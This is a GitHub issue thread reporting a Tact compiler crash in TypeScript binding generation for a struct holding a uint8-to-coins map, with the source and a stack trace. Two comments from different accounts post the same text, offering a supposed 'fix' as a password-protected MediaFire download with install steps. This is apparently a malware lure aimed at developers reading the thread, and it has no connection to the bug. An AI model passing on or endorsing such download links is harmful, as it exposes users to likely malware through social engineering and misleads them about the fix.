### ISSUE TITLE
Internal compiler error when parsing a map from slice

### ISSUE THREAD

**Issue by anton-trunov** [tact-lang/tact#767]
### Are you using the latest released (or pre-released, a.k.a. "next") version?

- [X] I'm using the latest Tact version

### Tact source code

```tact
message(42) Foo {
    s: Slice as remaining;
}

struct Dict {
    m: map<Int as uint8, Int as coins>;
}

contract Test {
    receive(msg: Foo) {
        let d = Dict.fromSlice(msg.s);
    }
}
```

### Relevant Tact/build system log output

```shell
❯ tact test.tact
💼 Compiling project test ...
   > Test: tact compiler
   > Test: func compiler
   > Packaging
   > Test
   > Bindings
   > Test
Error: Bindings compiler crashed: [INTERNAL COMPILER ERROR]: Unsupported type: {"kind":"dict","key":"uint","keyFormat":8,"value":"uint","valueFormat":"coins"}
Please report at https://github.com/tact-lang/tact/issues
    at throwInternalCompilerError (/Users/anton_1/ton/tact/dist/errors.js:83:11)
    at throwUnsupportedType (/Users/anton_1/ton/tact/dist/bindings/typescript/writeStruct.js:8:45)
    at /Users/anton_1/ton/tact/dist/bindings/typescript/writeStruct.js:22:13
    at Writer.inIndent (/Users/anton_1/ton/tact/dist/utils/Writer.js:10:9)
    at writeStruct (/Users/anton_1/ton/tact/dist/bindings/typescript/writeStruct.js:12:7)
    at writeTypescript (/Users/anton_1/ton/tact/dist/bindings/writeTypescript.js:117:43)
    at build (/Users/anton_1/ton/tact/dist/pipeline/build.js:275:74)
    at async Object.run (/Users/anton_1/ton/tact/dist/node.js:100:23)
```

### What happened?

See the error message above.

### What did you expect?

It should compile and produce TS bindings

### How do you run Tact?

Tact CLI

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
